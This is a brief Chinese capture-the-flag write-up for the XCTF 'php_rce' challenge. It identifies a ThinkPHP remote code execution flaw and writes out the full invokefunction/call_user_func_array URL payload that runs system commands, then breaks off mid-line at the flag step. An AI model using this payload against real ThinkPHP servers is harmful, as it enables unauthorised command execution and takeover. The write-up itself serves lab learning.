XCTF-高手進階區:php_rce

題目: 看到題目就知道是thinkphp的遠程執行漏洞 payload: index.php默認的話能夠不須要php index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代碼 注:代碼後面可不加分號 得到flag:web index.php?s=in
相關文章
相關標籤/搜索